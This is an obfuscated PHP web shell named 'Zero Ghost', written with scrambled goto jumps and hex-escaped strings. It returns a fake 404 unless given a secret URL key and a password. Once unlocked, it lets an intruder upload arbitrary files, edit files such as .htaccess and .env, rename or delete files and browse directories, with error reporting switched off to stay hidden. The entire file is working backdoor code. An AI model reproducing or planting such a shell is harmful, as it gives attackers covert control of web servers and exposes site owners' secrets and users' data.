<?php
 goto Dv3lz; TuU5M: echo "\74\160\x3e\360\x9f\x93\201\40\x43\x75\x72\162\145\156\x74\x20\x44\x69\x72\145\x63\164\157\x72\171\72\x20" . h(getcwd()) . "\x3c\x2f\160\x3e"; goto C8Wh0; C8Wh0: echo "\x3c\160\x3e\74\x61\x20\150\162\x65\146\75\x22\77\154\x6f\147\157\165\164\x3d\x31\42\76\360\237\224\222\x20\x4c\157\x67\x6f\x75\164\x3c\57\141\x3e\74\57\x70\x3e"; goto IOMMl; qHzSR: function isText($file) { $textFiles = array("\56\150\164\x61\x63\143\x65\163\163", "\56\145\156\x76", "\x2e\x67\x69\164\151\x67\x6e\x6f\162\145"); $extAllow = array("\160\x68\160", "\164\170\x74", "\x68\x74\x6d\154", "\x63\163\x73", "\152\163", "\152\163\x6f\156", "\x65\x6e\x76"); $basename = basename($file); $ext = pathinfo($basename, PATHINFO_EXTENSION); return @is_file($file) && (in_array($basename, $textFiles) || in_array($ext, $extAllow)); } goto paKRB; ugSk3: if (!isset($_SESSION["\x6b\145\171\137\166\145\x72\151\x66\151\x65\144"])) { if (!isset($_GET["\x6b\x65\x79"]) || $_GET["\x6b\x65\171"] !== "\132\x65\x72\x6f\x47\x68\157\163\x74") { http_response_code(404); die; } else { $_SESSION["\x6b\145\x79\x5f\x76\x65\162\x69\x66\151\145\144"] = true; } } goto urHgt; rg_bL: if (isset($_GET["\154\157\x67\157\165\x74"])) { session_destroy(); header("\x4c\x6f\143\141\x74\x69\x6f\156\72\40" . $_SERVER["\120\110\120\137\x53\x45\x4c\x46"]); die; } goto jRkdE; uvJY1: if (isset($_GET["\x64\145\154\145\x74\x65"])) { $target = $_GET["\144\x69\162"] . "\57" . $_GET["\x64\x65\154\145\164\x65"]; if (is_file($target)) { unlink($target); } elseif (is_dir($target)) { rmdir($target); } header("\114\157\x63\141\x74\x69\x6f\156\x3a\x20\x3f\144\151\x72\75" . urlencode($_GET["\x64\x69\x72"])); die; } goto eRw36; IOMMl: echo "\x3c\x66\x6f\x72\x6d\40\x65\x6e\x63\x74\171\160\145\x3d\42\x6d\x75\154\x74\151\160\x61\x72\164\57\x66\x6f\x72\x6d\x2d\144\141\164\x61\42\40\x6d\x65\x74\x68\x6f\144\75\42\x50\x4f\123\124\x22\76"; goto FjRcR; yKP5j: echo "\74\146\x6f\x72\x6d\x20\155\145\x74\150\157\144\x3d\x22\120\117\x53\124\42\40\x73\164\x79\154\145\75\42\155\x61\162\147\151\x6e\x2d\x74\x6f\160\72\61\60\x70\170\x3b\x22\x3e"; goto chObb; jRkdE: if (!isset($_SESSION["\154\x6f\x67\x67\145\144\137\x69\156"])) { if (isset($_POST["\x70\141\163\163"]) && password_verify($_POST["\x70\141\163\x73"], $hashed_password)) { $_SESSION["\154\x6f\x67\147\145\x64\x5f\151\156"] = true; header("\x4c\157\143\x61\x74\151\157\x6e\x3a\40" . $_SERVER["\120\110\x50\137\x53\x45\114\106"]); die; } echo "\74\146\x6f\162\155\x20\155\145\164\150\x6f\x64\x3d\42\x50\x4f\x53\124\42\76"; echo "\x3c\151\156\x70\165\164\40\x74\x79\160\145\x3d\42\160\x61\163\163\167\157\x72\144\42\40\156\x61\155\x65\x3d\42\x70\x61\163\163\x22\x20\x70\x6c\x61\x63\x65\x68\x6f\x6c\x64\x65\162\75\x22\x45\156\164\x65\162\x20\x50\x61\x73\x73\167\157\162\x64\42\76"; echo "\x3c\151\156\160\x75\164\x20\x74\x79\x70\x65\75\x22\163\165\x62\x6d\151\164\x22\x20\166\141\x6c\165\145\75\42\114\x6f\147\x69\x6e\42\76"; echo "\74\57\146\x6f\x72\x6d\76"; die; } goto AoaEs; soQ4R: function h($s) { return htmlspecialchars($s); } goto qHzSR; chObb: echo "\74\151\156\160\x75\x74\x20\164\x79\x70\x65\x3d\42\x74\145\170\164\42\40\156\141\155\x65\x3d\42\x6e\145\x77\146\157\154\144\145\162\x22\40\x70\x6c\141\x63\x65\x68\x6f\x6c\x64\145\162\x3d\x22\x46\157\x6c\144\x65\x72\40\116\x61\x6d\145\42\x3e"; goto jV_qv; MFLpR: if (isset($_GET["\162\x65\156\141\x6d\x65"])) { $old = $_GET["\x64\x69\x72"] . "\57" . $_GET["\162\x65\x6e\141\155\x65"]; if ($_SERVER["\x52\105\121\x55\105\123\x54\x5f\x4d\105\124\110\x4f\x44"] === "\120\x4f\x53\x54") { $new = $_GET["\144\x69\162"] . "\57" . $_POST["\x6e\145\167\x6e\x61\155\x65"]; rename($old, $new); header("\x4c\157\x63\x61\x74\x69\x6f\156\x3a\x20\77\144\151\162\75" . urlencode($_GET["\144\151\162"])); die; } echo "\x3c\146\157\x72\x6d\40\x6d\x65\x74\x68\x6f\144\x3d\47\120\x4f\123\x54\x27\76"; echo "\122\x65\x6e\141\155\145\40\164\x6f\x3a\x20\x3c\151\156\x70\165\x74\40\x6e\141\155\x65\75\x27\x6e\x65\x77\x6e\141\155\x65\47\x20\166\x61\154\x75\x65\75\x27" . h(basename($old)) . "\x27\x3e"; echo "\74\151\156\160\x75\x74\40\x74\x79\x70\145\75\x27\163\165\142\x6d\151\164\x27\40\166\x61\154\x75\x65\x3d\47\x52\145\x6e\x61\x6d\x65\47\x3e"; echo "\74\57\x66\157\162\x6d\76"; die; } goto T7Plc; l46R3: if (isset($_POST["\x63\162\145\141\164\x65\x66\157\154\x64\x65\162"]) && !empty($_POST["\156\145\x77\x66\157\154\144\x65\x72"])) { $folderName = basename($_POST["\x6e\145\x77\x66\157\x6c\x64\145\x72"]); if (!is_dir($folderName)) { mkdir($folderName); echo "\74\x70\76\342\234\205\40\x46\157\x6c\144\x65\x72\x20\x27{$folderName}\47\x20\142\145\x72\150\x61\163\151\x6c\40\x64\x69\x62\165\141\x74\74\x2f\160\76"; } else { echo "\74\160\x3e\xe2\232\xa0\357\xb8\217\40\106\x6f\x6c\x64\145\162\x20\x73\165\x64\x61\150\40\x61\144\x61\74\x2f\160\x3e"; } } goto vuKRg; z5sRJ: $dir = isset($_GET["\144\x69\x72"]) ? $_GET["\x64\151\x72"] : getcwd(); goto kjEWR; FjRcR: echo "\x3c\151\x6e\160\x75\x74\40\x74\x79\160\x65\75\42\146\151\154\x65\x22\x20\156\141\155\x65\75\x22\146\151\154\x65\x22\x3e"; goto JEB4R; gTemS: echo "\x3c\x2f\165\x6c\76"; goto uvJY1; jV_qv: echo "\x3c\x69\x6e\160\165\x74\x20\164\171\160\145\75\42\163\165\x62\155\x69\164\42\40\x6e\x61\155\145\x3d\x22\x63\x72\x65\141\x74\x65\146\157\x6c\x64\x65\x72\x22\40\x76\x61\154\165\x65\x3d\42\x43\162\x65\x61\x74\x65\x20\x46\157\154\144\145\162\x22\76"; goto rGlgG; H55lb: foreach ($files as $file) { if ($file == "\56") { continue; } $path = getcwd() . "\57" . $file; $urlDir = urlencode(getcwd()); $urlFile = urlencode($file); echo "\x3c\x6c\151\76{$file}\x20"; if (is_dir($file)) { echo "\x5b\x3c\x61\x20\150\162\x65\x66\75\47\x3f\x64\x69\162\x3d" . urlencode(realpath($path)) . "\x27\76\x4f\160\145\156\74\57\141\x3e\x5d"; } if (isText($file)) { echo "\133\74\x61\x20\x68\x72\145\146\75\47\77\x65\x64\x69\164\x3d{$urlFile}\x26\144\151\x72\75{$urlDir}\47\76\105\144\x69\x74\x3c\57\x61\x3e\x5d"; } echo "\x20\x5b\74\x61\x20\150\x72\x65\x66\x3d\47\77\144\x65\x6c\x65\164\x65\x3d{$urlFile}\x26\x64\x69\x72\x3d{$urlDir}\x27\x20\157\x6e\x63\154\151\143\x6b\x3d\47\162\145\x74\x75\x72\156\40\x63\157\x6e\x66\x69\162\155\50\42\110\141\x70\165\x73\x3f\x22\x29\47\76\x44\x65\154\x65\164\145\x3c\x2f\x61\x3e\135"; echo "\x20\133\x3c\x61\x20\150\162\x65\x66\75\47\x3f\x72\145\156\x61\155\145\x3d{$urlFile}\46\144\x69\x72\75{$urlDir}\47\76\x52\145\x6e\x61\155\x65\74\57\x61\x3e\x5d"; echo "\x3c\57\154\151\76"; } goto gTemS; rqcPF: $files = scandir("\x2e"); goto soQ4R; JEB4R: echo "\74\151\x6e\160\165\164\x20\x74\171\x70\x65\x3d\42\163\x75\x62\155\151\x74\x22\40\x76\x61\154\x75\145\75\x22\125\160\x6c\157\141\144\42\76"; goto t6i5q; eRw36: if (isset($_GET["\145\x64\x69\164"])) { $file = $_GET["\x64\x69\162"] . "\x2f" . $_GET["\x65\x64\x69\164"]; if ($_SERVER["\122\105\121\x55\105\123\124\137\x4d\105\124\x48\117\x44"] === "\120\x4f\123\124") { file_put_contents($file, $_POST["\143\157\156\x74\145\156\164"]); echo "\74\x70\x3e\xe2\234\x85\40\x44\x69\163\x69\x6d\160\x61\x6e\74\x2f\160\76"; } $content = @file_get_contents($file); echo "\74\x66\157\162\x6d\40\155\145\x74\150\157\144\x3d\x27\x50\x4f\x53\x54\x27\x3e"; echo "\74\164\x65\170\164\x61\162\145\x61\x20\156\x61\x6d\145\x3d\47\143\157\x6e\164\145\156\x74\47\40\162\157\x77\x73\75\47\x32\x30\47\40\x63\157\x6c\x73\75\47\61\x30\60\x27\x3e" . h($content) . "\x3c\57\x74\x65\170\x74\x61\x72\145\141\x3e\x3c\x62\162\x3e"; echo "\74\x69\156\x70\165\164\x20\164\171\x70\145\75\47\163\165\142\x6d\x69\x74\47\x20\166\141\x6c\x75\x65\x3d\x27\x53\141\x76\x65\47\x3e"; echo "\x3c\x2f\x66\x6f\162\155\76"; die; } goto MFLpR; paKRB: if ($_FILES) { move_uploaded_file($_FILES["\146\151\x6c\145"]["\x74\155\160\137\x6e\x61\155\x65"], $_FILES["\x66\x69\x6c\145"]["\156\x61\155\x65"]); echo "\74\160\76\xe2\x9c\x85\x20\125\x70\154\157\x61\144\x65\x64\x3a\40" . h($_FILES["\146\x69\x6c\x65"]["\156\141\155\x65"]) . "\x3c\57\160\x3e"; } goto l46R3; AoaEs: error_reporting(0); goto z5sRJ; urHgt: $hashed_password = "\x24\x32\x79\44\61\60\44\60\x67\130\154\x6d\x79\111\x75\x48\x43\x65\105\113\116\125\x39\x4d\155\x6d\71\151\165\131\x59\167\62\x62\x37\x71\117\163\126\116\162\x47\121\122\x64\x56\172\x56\x6f\124\145\112\121\144\61\x70\x43\x38\126\66"; goto rg_bL; pgaJS: echo "\74\x75\154\x3e"; goto H55lb; Dv3lz: session_start(); goto ugSk3; t6i5q: echo "\x3c\x2f\146\157\x72\155\76"; goto yKP5j; vuKRg: echo "\74\150\62\x3e\xf0\x9f\x97\x82\xef\270\x8f\x20\132\x65\162\x6f\x20\x47\150\x6f\163\164\74\57\x68\62\76"; goto TuU5M; rGlgG: echo "\x3c\57\x66\157\162\155\76"; goto pgaJS; kjEWR: chdir($dir); goto rqcPF; T7Plc: ?>